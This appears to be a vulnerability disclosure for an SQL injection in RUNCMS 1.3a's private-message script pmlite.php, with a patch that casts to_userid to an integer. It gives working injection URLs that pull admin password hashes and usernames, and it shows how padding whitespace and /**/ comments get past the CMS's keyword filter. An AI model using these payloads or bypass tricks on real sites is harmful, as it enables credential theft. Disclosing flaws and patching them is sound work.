refrence: http://www.runcms.org/public/modules/forum/viewtopic.php?topic_id=4003&forum=18 http://hamid.ir/security/ ----------------------------------------------- RUNCMS 1.3a SQL injection Runcms Includes most things a webmaster would expect from a cms: downloads, links, tutorials section, polls, forums, news, faq, contact form, rss feeds, file uploads, blogging via xml-rpc, & more. Possibility to manage users as groups with module/block specific access permissions, and extend functioality via 3rd party module plug-ins and ... Original Author: The Xoops Project http://www.xoops.org http://www.runcms.org Credit: The information has been provided by Hamid Ebadi ( Hamid Network Security Team): admin[AT]hamid[o]ir The original article can be found at: http://hamid.ir/security/ Vulnerable Systems: tested on RUNCMS 1.3a and RUNCM 1.2 (and below ?) Detail :: Send Private Message The following URL can be used to trigger an SQL injection vulnerability in the pmlite.php [ but no error will disply ! ] http://localhost/modules/messages/pmlite.php?send=1&to_userid=-1[SQL INJECTION] http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1 union select pass from runcms_users internal RUNCMS protection will block this request and redirect your browser to http://localhost/abuse.php and you will see this warning: " WARNING !!!!!! You were trying to abuse the system, a logfile was created ..." what is the problem ? Bypassing Protection : as i underestand RUNCMS just filter (union select) and (union all select) and ....! but they forgot (union select) ! exploit: http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5 there is another way to bypass runcms internal protection simply add " /**/ " in your query exploit will be something like this : http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir Unofficial Patch: line 33 : pmlite.php $to_userid = !empty($_POST['to_userid']) ? $_POST['to_userid'] : $_GET['to_userid']; // Hamid Ebadi (hamid Network Security Team): patch for RUNCMS 1.3a and below . $to_userid=intval($to_userid); //add this line plz HAMID $send = $_POST['send']; Signature __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com